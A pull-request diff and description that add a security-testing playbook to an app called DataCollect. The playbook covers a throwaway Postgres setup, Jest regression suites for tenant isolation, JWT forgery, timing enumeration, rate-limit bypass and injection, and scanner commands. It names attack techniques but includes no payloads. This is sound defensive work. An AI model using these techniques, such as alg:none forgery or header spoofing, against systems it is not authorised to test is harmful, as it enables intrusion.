+- `implementing-secret-scanning-with-gitleaks`, `performing-sca-dependency-scanning-with-snyk`, `scanning-containers-with-trivy-in-cicd`, `implementing-semgrep-for-custom-sast-rules`.
+
+Skills that do **not** apply (no such surface in DataCollect): GraphQL, NoSQL,
+WebSocket, OAuth2/OIDC provider, XXE/XML, and insecure deserialization.
+
+## Stand up a local target
+
+Start a throwaway PostgreSQL and point the backend at it:
+
+```bash
+docker run -d --name dc-test-pg \
+  -e POSTGRES_USER=admin -e POSTGRES_PASSWORD=admin -e POSTGRES_DB=datacollect \
+  -p 5433:5432 postgres:15
+```
+
+For manual probing against a running server, start the backend and seed demo
+data (see the `seed` script in the root `package.json`), then obtain tokens:
+
+```bash
+# Admin token
+curl -s http://localhost:3000/api/users/login \
+  -H 'Content-Type: application/json' \
+  -d '{"email":"admin@example.com","password":"<admin-password>"}' | jq -r .token
+```
+
+Create a second tenant and a `USER`-role account in a different tenant to test
+cross-tenant access. See the API reference under **For Developers** for the
+`/api/users` and `/api/apps` request shapes.
+
+## Re-run the API attack skills as regression tests
+
+The probe methodologies from the skills above are captured as durable Jest
+suites so they can be re-run in CI or locally without a manual proxy. They boot
+the real server in-process and drive it with `supertest` against a real
+PostgreSQL. Run them with `POSTGRES_TEST` pointed at the throwaway database:
+
+```bash
+cd packages/backend
+POSTGRES_TEST="postgresql://admin:admin@localhost:5433/datacollect" \
+  pnpm test security-
+```
+
+The suites under `packages/backend/src/__tests__/` include:
+
+| Suite | Skill it mirrors | What it checks |
+| --- | --- | --- |
+| `security-tenant-isolation` | BOLA / broken object level authorization | a tenant-A user cannot read/modify tenant-B entities, attachments, or reviews |
+| `security-auth` | API authentication weaknesses, JWT | forged/tampered/`alg:none` tokens rejected; protected routes require auth |
+| `security-login-timing` | user enumeration via timing | login runs a hash comparison even for unknown emails |
+| `security-ratelimit-proxy` | rate-limit bypass | rotating `X-Forwarded-For` cannot defeat the login limiter |
+| `security-input-validation` | SQL/argument injection | malformed and injection payloads are rejected, not executed |
+| `security-error-handling` | sensitive data exposure | errors do not leak stack traces, paths, or SQL |
+| `phase1-backend-hardening`, `security-phase1-fixes` | assorted hardening | regression coverage for earlier fixes |
+
+When adding a new endpoint, add a matching case to the relevant suite — treat a
+skill finding as a failing test to be turned green.
+
+## Run the static scanners
+
+These run against the repository, not a live server. On SELinux hosts (e.g.
+Fedora) Docker bind mounts need a `:Z` label, and `gitleaks` reads the git
+history most reliably from an exported tree.
+
+```bash
+# Dependency vulnerabilities (SCA). Triage the runtime subset separately:
+pnpm audit
+pnpm audit --prod
+
+# SAST (install semgrep separately, e.g. `pipx install semgrep`)
+semgrep scan --config p/javascript --config p/owasp-top-ten \
+  packages/backend/src packages/datacollect/src
+
+# Secret scanning over tracked files (export first to avoid mount/history issues)
+mkdir -p /tmp/dc-scan && git archive HEAD | tar -x -C /tmp/dc-scan
+docker run --rm -v /tmp/dc-scan:/repo:Z zricethezav/gitleaks:latest \
+  detect --source=/repo --no-git --no-banner --redact
+
+# Container / Dockerfile misconfiguration
+docker run --rm -v "$PWD/docker":/docker:Z aquasec/trivy:latest \
+  config /docker --severity HIGH,CRITICAL
+```
+
+Expect noise: most `pnpm audit` findings are in the dev/build toolchain, and
+`gitleaks`/`semgrep` will flag placeholder tokens in tests and docs. Confirm
+each finding against the source before acting on it.
+
+## Clean up
+
+```bash
+docker rm -f dc-test-pg
+rm -rf /tmp/dc-scan
+```
+
+## Findings already addressed
+
+The initial assessment confirmed the multi-tenant BOLA defenses hold and the
+JWT/auth handling is sound. Fixes that landed from it:
+
+- OTP `devCode` is returned only when `OTP_EXPOSE_DEV_CODE=true`, and the
+  backend container runs as a non-root user.
+- Login compares a placeholder hash for unknown emails (anti-enumeration), and
+  `trust proxy` is configurable via `TRUST_PROXY` (default off) so
+  `X-Forwarded-For` cannot be spoofed to bypass rate limiting.
+
+Check the code before re-reporting these.

--- a/website/sidebars.ts
+++ b/website/sidebars.ts
@@ -378,6 +378,10 @@ const developerSidebarItems = [
             type: "doc",
             id: "how-to/create-custom-auth-adapter",
           },
+          {
+            type: "doc",
+            id: "how-to/security-testing",
+          },
         ],
       },
       {


### PR DESCRIPTION
## Summary

Makes it easy for developer peers to re-run the security assessment against
DataCollect, in two parts:

### 1. Playbook (`website/docs/how-to/security-testing.md`)

Linked under **For Developers → How-To Guides**. Covers the skills pack, standing
up a throwaway Postgres + backend, re-running the attack methodologies as the
durable `security-*` Jest suites (table mapping each suite to the skill it
mirrors), the static scanners (pnpm audit, Semgrep, Gitleaks, Trivy) with the
exact commands and the SELinux `:Z` / `git archive` gotchas, and a short list of
findings already fixed.

### 2. Vendored skills subset (`security/skills/`)

The 24 curated skills that map to DataCollect's stack, vendored from
[Anthropic-Cybersecurity-Skills](https://github.com/mukul975/Anthropic-Cybersecurity-Skills)
so peers don't need the upstream pull.

- **License:** upstream is Apache-2.0 (verified via the GitHub API and the
  bundled `LICENSE`); DataCollect is also Apache-2.0, so redistribution is
  compatible. Attribution and the pinned upstream commit
  (`673da1f`) are recorded in `security/skills/README.md`.
- **Not affiliated with Anthropic** — the README flags the pack as untrusted,
  community-maintained third-party content despite its name.
- **Safety:** several skills are offensive; the README states they must only run
  against authorized targets. I scanned the vendored `scripts/` — no exfiltration,
  destructive ops, or obfuscated exec; the hardcoded URLs are the expected SSRF
  payload targets.
- Vendored files live outside `packages/`, so the license-header hook/CI (which
  globs `packages/**`) does not apply; the third-party files keep their own terms.

## Notes

- The `security-login-timing` / `security-ratelimit-proxy` suites referenced in
  the playbook land with the login-hardening PR (#39); merge that first or
  together for those references to resolve.
